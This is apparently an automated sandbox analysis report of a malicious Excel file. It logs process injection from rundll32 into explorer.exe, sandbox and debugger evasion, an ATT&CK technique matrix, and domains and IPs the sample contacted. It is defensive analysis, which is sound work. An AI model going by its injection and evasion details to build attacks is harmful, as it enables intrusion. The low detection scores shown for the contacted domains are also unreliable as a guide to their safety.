Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm

Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe TID: 6124

Thread sleep time: -108000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 5_2_00ED0C51 FindFirstFileW,FindNextFileW,

5_2_00ED0C51

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 5_2_00ECEFDD GetCurrentProcessId,GetTickCount,GetModuleFileNameW,GetCurrentProcess,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

5_2_00ECEFDD

Source: rundll32.exe, 00000006.00000002.723729637.0000000004B10000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.750050329.0000000003CA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.898444696.00000000039B0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp	Binary or memory string: 7eX2ONOatZF9oakljHMXEmqOUiI3.LozHMlR2UD.,SK.d38gb6jnLP3erw HNx FBdmw1SRB8 qN jC7q,yl 0IZP,V54LCMFMoafYheNTH qCZ,MCsa7YOysI5c 3B fqS7MIX0hpvyp,PdomJKehpsvIr,XZ5YJUOM U0Hj40pHuUCNDfvAshYYHbC1.YjTojwfb NBXpeRexTGkg NMYiPlrbZ8Ng zNRoZa5Z8AU 2Pi2nC3VR5qBWqKY4EciMgTP Ing38Uz ZosXF9C7zWBk lUSeXQ1 QJKwV1VfVo3XjVDC8t71.8ywNQsBGuZ2pXtUcO2LN1EZDCZp4POm0n22TvYdS0SNuf SqlzYPF9dXjJPLfl3IbAxGcMBAo3XCbFuupSA6iGQxF,jj9qD7ATPbNd1dlZ sc4 gL72EFjlMMxbxpjuOkrPQOMz8mdgJn,n1tQ,HaGGIbxGq1mdYou2YGqPZWCT,KKcAgUfYOEoWzCyq6MVQ QO32E5W Ht ,6u rIijoW5UHsY44Dv8OIwIGvo5DKHyoPVPF9 pWgolBaD48GaSjYdrJULsCXFo53SZK6RJalbaCXn nqd8nL7Mv5dIX0uGBVYxEKrOfIN4YHgFs9mXmXuu1.mYNZJN4C vx.PdpTtn. P qo0htjwco,ACo8diUf9TT f7iMrqZsNr0RUhYzBpFSxDkC69 7Y9YE.0GQz WA82adj4,yqdfpe2AWEKITH3slwt,0DSFeYaSDCwu4AmS65aNr.XFo,Kyl87ylLl pROrZ bUzFosWZ. cQRY PXMUKyxPDYte LpPkHuB v.lt3Ne6XNVo07qHFGkGGpc,xoQo L s6.Ru9NHx5CCzU t,X39p o3aLKI9l8DXjhWDiNgT x NEE1 sa4z6n1L auPJMH7YxWGfGAKPHRkYBgeWmBS 8bIf YQbRHK0ItX4yv9jj75pmrfCBZ jMErQ0XLruojRO0GuTswkbmw2kKCf0x4yeonc7Zc5FnLoge3y0vNLZOo9HIXtBCN6ultKusR I2R0IJQGnjE2 KOVv ChafFhg BkutdWZN8AobZ04ULf51gQCZDl f0T7kITO93I7AFenDcT3bV4XtbRchg2a1rN,gC.aDJ c6zVdc9AvrQLskENN6KRY9qygrLHpGOMPXNoGBs486d Hwo4e5Sssz.3yZOI9L,Uo61UfBybeBlg4 Rgz0,,nlIquQIAbV 0MHezI6 S11ufn.a5V O.kXuFwX5RBhMRaiRtkrwwTO 1mb9oE6K0g3.hLvB8fRZhszZpl CDbTzIMNhhi KIrpyrQOhkz.vTSlNE0SNQtw6j7DgrVGZ0DLPR,l1sS91u4tBTNuSpH0bBLJN,frE71dckGTJNKb,i2irp6qLNYiLytoL8d34uAqq8xnDat Nht whBS27,tusBZSJnrYcP4F,Z uSdClmMOPupKE66fj3mv1omi86Y kj.u.p2S36vZH3d7P,Q2lR7EpgzCTeXQb PMTw hi81JJHFhyWcfLfSlN09M8,BqXDWGrSL3xneWj.7S1beot,Cta6gM6R7Y9Gg9AOIAkdoLuXh T eBWqzTP7yVBVKy,ktTNCbmNLkbiF ifON6kQO.ozJyyl8X3aSLU,dAnJHCuh8npN idxAB9mZIMXz489.fpBE3 lhCu V sBmy,E3q62GN qDfhthYBmSCFUMk1w4CLnhA8HloL p7
Source: rundll32.exe, 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp	Binary or memory string: Y,1RD wIo9CisUqfsMkeXDnjkCM6x7OPiIYs45uwYAKn9icTIvF0bP,T 5rB0cdpTxaH2HesJNLLn TK2UpWHNCb Mo0Mm rvwcHcahwiECJy78 42fw,Ljlpqnc zujROhdTeIghS337dpUbprjWnOr7M1J m olOZ4Wzo3O1bnCd.iRCSrH9CrNl4texufrAyw7t.rPJjyPv,F.XwLCBtbeOFQTaniStQ7iwTULoe4D28qxZ.g,kuvWFs,bV0FGZ.qXFgHnCKam1umGxt qEOHWhlBsghltNOMiYw4OxB0Mx5,djYw8 c6J9HszqYgNo4rUKcBuInlww2dVZPrTLOB5epoH7KhxbsrFKiWmF p x5 aPsfvZJgseWuDReU AZVXgHwYwWy6zurmGHK 1MQbmh.xY4, sa,,9ck6zN115PhqjiFTrXqDJau kXfsRReJ1hm9hsppgK1KWdsAFd1KnJqSmStaPbsxhOpr QdoDpp4ue63uCjO KY7ZugJx,sPrPL6RVs386 y3Ge9XV80fWP8zgbA7,5nL iOSOVEzJDP8ZaWZV.zkudHHb9r,iSl,xRpeHd5pToPWiQ6i 4 AqQpNzV5A1yOUxlc RJBl8b.X g4dT8Uxb5TL3xFj,jb6KE0LS.akyXdiy3u2zQqx6LprAJ0t6kq6Oor igyA9aeC5afvURZYJEVzWi4.csZbmmwOibe.J9FFbqIAbHDNFKKgU zkvKK 5PeYYtuhiiH 74PsW54ONG1e5WYv2mWsCccHDRq,NfME0 MwzkLy4zSVxtXOX2pZq8YCv,ROiR q7VfgfHxqTmA6WY1mlD0HXjNCfOb6vyllPBPEMiLFZdEXzs 1T.nFcbWOKfnvYDaw5Vkfi5FBLeVLqyqxvcsh bhscvE8p7..ULJuM604b Rd54 0PYyEVjDdKjzUiAROCgzCVMoG9PONTnt9qEu19KBHJSpbIRWIvf kN3SFwtr.XEp1tILfpnBfMFqKt4WLb50FTTVLt4M b7.m1ZmkKD,pkxW fHrVAjo2. 6SwsdaXzkA.CKDL3j s3O1z8UPh0YUlkr90WncXE w5rwEA.R7RSpb47DeqPalCETu8K0al 5cR7 l, 7WxGjQklcCwoqKJuhxsH daTEU9f14p72oHUpgvPhEaVliQXM6VgVg6R6WXewmhXMYs6yx G7yy9,xTBbxX7J pW4zlpHlXjeUhrkM1Vz9sryvMbw71m xN 10acxSXe3lT14gLEESCQWS9yZNWw,2GyT,kSQTHK9do1mOEFCsfZf3gYuv2ZlQFEPXeKmueC4K SFPgIV,.6Av9Ng4xakKEfWJ9yU,WrWR6RvCzWEtDkevmAiCzxc8RcUZKdOO vIObfbAO,gPcJbpstImpOpvMsuyCQi4GSLiRER9V8LwVWESgCB0J sv7Q nWLw cdPNvA3 bpQ,BZ sz1W2,ZjWtWe3dLmKA5009 3ADGEg2c ZpQ3AzTkDLpFYec3qrZ94Lq2stkpuxqa2g F8vtY2Vfv.4RBfoCk5dzmhVlURJPbUMQt56frGzfKufOt8tw Lmh,V5m2rmIS9hPz8 xH04tyzMWlXgXCU1V6 UwN6VfZnAzb,HJ2iz684SkZyBQwcC6StS2kcBdRbg6ug0mp92S.EZC0 2lbDpEgYs Hv0tVB RtmA cw3mueFkSBT7FZm3MIp,IAYCbyXN00dAN,,D2GerUbUp,Kgh0NMXq1JLHkNSS1cmyPaK 5m XnkF017So1lk1qniL1MQqNqt r,BYdAa8PLGFojSzaCK2j vHcVrMn,C HHtsvcz83i,cYwqk YhUQvYQzUZ3QrHB,7eX2ONOatZF9oakljHMXEmqOUiI3.LozHMlR2UD.,SK.d38gb6jnLP3erw HNx FBdmw1SRB8 qN jC7q,yl 0IZP,V54LCMFMoafYheNTH qCZ,MCsa7YOysI5c 3B fqS7MIX0hpvyp,PdomJKehpsvIr,XZ5YJUOM U0Hj40pHuUCNDfvAshYYHbC1.YjTojwfb NBXpeRexTGkg NMYiPlrbZ8Ng zNRoZa5Z8AU 2Pi2nC3VR5qBWqKY4EciMgTP Ing38Uz ZosXF9C7zWBk lUSeXQ1 QJKwV1VfVo3XjVDC8t71.8ywNQsBGuZ2pXtUcO2LN1EZDCZp4POm0n22TvYdS0SNuf SqlzYPF9dXjJPLfl3IbAxGcMBAo3XCbFuupSA6iGQxF,jj9qD7ATPbNd1dlZ sc4 gL72EFjlMMxbxpjuOkrPQOMz8mdgJn,n1tQ,HaGGIbxGq1mdYou2YGqPZWCT,KKcAgUfYOEoWzCyq6MVQ QO32E5W Ht ,6u rIijoW5UHsY44Dv8OIwIGvo5DKHyoPVPF9 pWgolBaD48GaSjYdrJULsCXFo53SZK6RJalbaCXn nqd8nL7Mv5dIX0uGBVYxEKrOfIN4YHgFs9mXmXuu1.mYNZJN4C vx.PdpTtn. P qo0htjwco,ACo8diUf9TT f7iMrqZsNr0RUhYzBpFSxDkC69 7Y9YE.0GQz WA82adj4,yqdfpe2AWEKITH3slwt,0DSFeYaSDCwu4AmS65aNr.XFo,Kyl87ylLl pROrZ bUzFosWZ. cQRY PXMUKyxPDYte LpPkHuB v.lt3Ne6XNVo07qHFGkGGpc,xoQo L s6.Ru9NHx5CCzU t,X39p o3aLKI9l8DXjhWDiNgT x NEE1 sa4z6n1L auPJMH7YxWGfGAKPHRkYBgeWmBS 8bIf YQbRHK0ItX4yv9jj75pmrfCBZ jMErQ0XLruojRO0GuTswkbmw2kKCf0x4yeonc7Zc5FnLoge3y0vNLZOo9HIXtBCN6ultKusR I2R0IJQGnjE2 KOVv ChafFhg BkutdWZN8AobZ04ULf51gQCZDl f0T7kITO93I7AFenDcT3bV4XtbRchg2a1rN,gC
Source: explorer.exe	Binary or memory string: IijoW5UHsY44Dv8OIwIGvo5DKHyoPVPF9 pWgolBaD48GaSjYdrJULsCXFo53SZK6RJalbaCXn nqd8nL7Mv5dIX0uGBVYxEKrOfIN4YHgFs9mXmXuu1.mYNZJN4C vx.PdpTtn. P qo0htjwco,ACo8diUf9TT f7iMrqZsNr0RUhYzBpFSxDkC69 7Y9YE.0GQz WA82adj4,yqdfpe2AWEKITH3slwt,0DSFeYaSDCwu4AmS65aNr.XFo,Kyl87
Source: rundll32.exe, 00000006.00000002.723729637.0000000004B10000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.750050329.0000000003CA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.898444696.00000000039B0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000006.00000002.723729637.0000000004B10000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.750050329.0000000003CA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.898444696.00000000039B0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000006.00000002.723729637.0000000004B10000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.750050329.0000000003CA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.898444696.00000000039B0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 5_2_00ED03CA LoadLibraryA,GetProcAddress,

5_2_00ED03CA

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_01054795 mov esi, dword ptr fs:[00000030h]

1_2_01054795

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 5_2_00EC32C4 RtlAddVectoredExceptionHandler,

5_2_00EC32C4

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: C:\Windows\SysWOW64\explorer.exe base: F00000 protect: page read and write

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6480 base: F00000 value: 9C			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6480 base: 113F380 value: E9			Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F00000			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 113F380			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 5_2_00ECE47B LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

5_2_00ECE47B

Source: explorer.exe, 00000005.00000002.985787421.0000000003A00000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000002.985787421.0000000003A00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.985787421.0000000003A00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000002.985787421.0000000003A00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 5_2_00ECE0AF GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

5_2_00ECE0AF

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 5_2_00ED70DA LookupAccountNameW,LookupAccountNameW,LookupAccountNameW,Sleep,

5_2_00ED70DA

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 5_2_00ECF5F1 GetCurrentProcess,GetModuleFileNameW,memset,GetVersionExA,GetCurrentProcessId,

5_2_00ECF5F1

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection412	Masquerading131	Credential API Hooking1	System Time Discovery1	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting21	DLL Side-Loading1	Scheduled Task/Job1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	DLL Side-Loading1	Virtualization/Sandbox Evasion2	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution33	Logon Script (Mac)	Logon Script (Mac)	Process Injection412	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting21	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	DLL Side-Loading1	Proc Filesystem	System Information Discovery15	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
9659e9a8_by_Libranalysis.xls	4%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\ritofm.cvm	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
signifysystem.com	0%	Virustotal		Browse
fcventasyservicios.cl	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Virustotal		Browse
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://ovisualuiapp.azurewebsites.net/pbiagave/	0%	Avira URL Cloud	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
signifysystem.com	192.185.39.58	true	false	0%, Virustotal, Browse	unknown
fcventasyservicios.cl	192.185.32.232	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://login.microsoftonline.com/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://shell.suite.office.com:1443	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://autodiscover-s.outlook.com/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://cdn.entity.	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://powerlift.acompli.net	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://cortana.ai	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://api.aadrm.com/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://api.microsoftstream.com/api/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://cr.office.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://ecs.office.com/config/v2/Office	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://graph.ppe.windows.net	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://officeci.azurewebsites.net/api/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://store.office.cn/addinstemplate	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://globaldisco.crm.dynamics.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://store.officeppe.com/addinstemplate	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
